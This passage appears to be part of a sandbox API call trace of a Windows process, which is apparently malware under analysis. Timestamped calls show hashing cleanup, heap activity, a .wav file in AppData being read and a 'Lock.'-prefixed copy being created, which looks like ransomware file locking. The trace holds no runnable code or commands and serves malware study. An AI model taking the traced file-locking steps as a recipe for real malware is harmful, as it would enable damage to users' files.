lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f80, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0121.748] CryptDestroyHash (hHash=0x9a4900) returned 1 [0121.748] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.748] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.748] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.748] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.748] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.749] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/bNDu1R0FYJg.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\bndu1r0fyjg.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4 [0121.749] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.749] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0121.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0121.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0121.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0121.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0121.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0121.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0121.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0121.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0121.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0121.749] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0121.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0121.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0121.750] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0121.750] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0121.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0121.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0121.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0121.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0121.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0121.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0121.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0121.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0121.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0121.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0121.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0121.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0121.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0121.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0121.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0121.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0121.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0121.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0121.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0121.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0121.750] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0121.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0121.750] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0121.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0121.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2aaf410 [0121.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0121.751] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0121.751] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.bNDu1R0FYJg.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.bndu1r0fyjg.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f0 [0121.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fc0 [0121.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0121.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0121.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0121.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0121.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0121.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0121.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0121.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0121.752] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0121.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0121.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0121.752] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0121.752] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0121.752] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0121.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0121.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0121.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0121.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0121.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0121.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0121.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0121.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0121.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0121.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0121.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0121.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0121.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0121.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0121.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0121.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0121.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0121.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0121.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0121.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0121.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0121.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0121.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0121.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0121.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0121.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0121.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0121.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0121.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0121.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0121.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cd3020 [0121.770] SetFilePointerEx (in: hFile=0x4f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0121.770] ReadFile (in: hFile=0x4f4, lpBuffer=0x37c0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x37c0048*, lpNumberOfBytesRead=0x8cf4f8*=0x9ff1, lpOverlapped=0x0) returned 1 [0121.772] ReadFile (in: hFile=0x4f4, lpBuffer=0x37c0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x37c0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0121.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0121.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0121.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0121.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0121.772] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9ff1) returned 0x2abf418 [0121.772] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cd3020 | out: hHeap=0x2af0000) returned 1 [0121.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0121.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0121.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0121.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0121.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0121.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0121.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0121.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0121.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9ff1) returned 0x2a7a130 [0121.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2abf418 | out: hHeap=0x2af0000) returned 1 [0121.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0121.778] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0121.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0121.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0121.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0121.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0121.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9ff1) returned 0x2abf418 [0121.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0121.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2abf418 | out: hHeap=0x2af0000) returned 1 [0121.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0121.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0121.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0121.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0121.778] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0121.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0121.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0121.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0121.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0121.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0121.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0121.779] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0121.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0121.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0121.779] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0121.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0121.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0121.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0121.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ac8 [0121.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0121.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0121.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0121.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0121.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9ff1) returned 0x2abf418 [0121.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0121.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a98 [0121.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0121.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0121.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0121.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ae8 [0121.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0121.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0121.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0121.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71af8 [0121.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0121.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0121.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0121.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa0f0 [0121.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0121.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0121.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0121.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0121.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0121.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0121.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0121.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9ff1) returned 0x2a84130 [0121.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0121.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0121.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0121.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0121.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0121.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0121.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0121.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0121.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0121.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0121.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0121.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0121.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0121.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0121.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0121.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0121.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0121.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0121.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0121.781] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0121.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0121.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0121.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0121.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0121.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0121.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0121.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0121.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0121.781] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0121.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0121.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0121.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0121.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0121.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0121.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0121.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | 